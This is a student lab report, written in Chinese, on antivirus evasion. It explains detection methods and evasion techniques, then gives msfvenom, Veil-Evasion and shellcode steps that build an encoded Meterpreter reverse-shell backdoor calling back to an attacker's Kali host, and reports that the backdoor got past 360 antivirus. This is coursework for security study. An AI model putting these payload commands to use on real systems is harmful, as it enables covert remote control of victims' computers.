20155324《網絡對抗》免殺原理與實踐

20155324《網絡對抗》免殺原理與實踐

免殺原理

實驗內容

（1）理解免殺技術原理

（2）正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；

（3）經過組合應用各類技術實現惡意代碼免殺

（4）用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 正常行爲分析法：正常行爲分析常被應用於異常檢測之中，是指對程序的正常行爲輪廓進行分析和表示，爲程序創建一個安全行爲庫，當被監測程序的實際行爲與其安全行爲庫中的正常行爲不一致或存在必定差別時，則可能爲惡意代碼
• 特徵檢測法：系統分析獲取惡意代碼一般具備明顯特徵碼，當檢測到代碼含有特徵碼則可能爲惡意代碼

（2）免殺是作什麼？

• 免殺是不會被殺毒軟件軟件殺掉的病毒或木馬 是病毒的製做人 爲了避免讓病毒被識別出來 經過鑽殺毒軟件漏洞或者將病毒假裝成正常程序的辦法 來逃避殺毒軟件的查殺

（3）免殺的基本方法有哪些？

• 修改特徵碼：對惡意代碼的特徵碼進行修改，好比添加一些指令，讓殺軟沒法識別其是否爲惡意代碼
• 加花：經過添加加花指令（一些垃圾指令，相似加1減1之類的無用語句）讓殺毒軟件檢測不到特徵碼。加花能夠分爲加區加花和去頭加花
• 加殼：給原程序加上一段保護程序，有保護和加密功能，運行加殼後的文件先運行殼再運行真實文件，從而起到保護做用

正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧

• 將文件傳至virscan.org進行檢測
  

有18個殺毒軟件查出來了。掃描結果:46%的殺軟(18/39)報告發現病毒

msf用編碼器生成執行文件 編碼一次

Kali輸入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口號 -f exe >本身起後門名字.exe

再次

使用Veil-Evasion從新編寫源代碼

在Kali中安裝veil，sudo apt-get install veil

• 在Kali的終端中啓動Veil-Evasion
  命令行中輸入veil，後在veil中輸入命令use evasion
  依次輸入以下命令生成你的可執行文件：

use python/meterpreter/rev_tcp.py（設置payload）

set LHOST Kali的IP（設置反彈鏈接IP）

set LPORT 端口號（設置反彈端口）

generate
可執行文件名

選擇使用語言來編寫

利用shellcode編程實現免殺

• 首先，在Kali上使用命令生成一個c語言格式的Shellcode數組。

• VS編譯運行產生exe文件（exe文件名不能存在20155324這樣的學號）

實測優化版本、回連成功

按照上次實驗用過的msf監聽方法在Kali上打開監聽，在Win主機開啓殺軟（Win安裝360 ）的狀況下，運行最後生成的優化版exe文件，Kali成功獲取了Win主機的權限

實驗總結

經過本次實驗讓我進一步瞭解了病毒的可怕，居然都能經過360的檢查，真是太恐怖了。仍是本身作的頗有成就感！但願在之後的學習中可以更多的學到這些知識。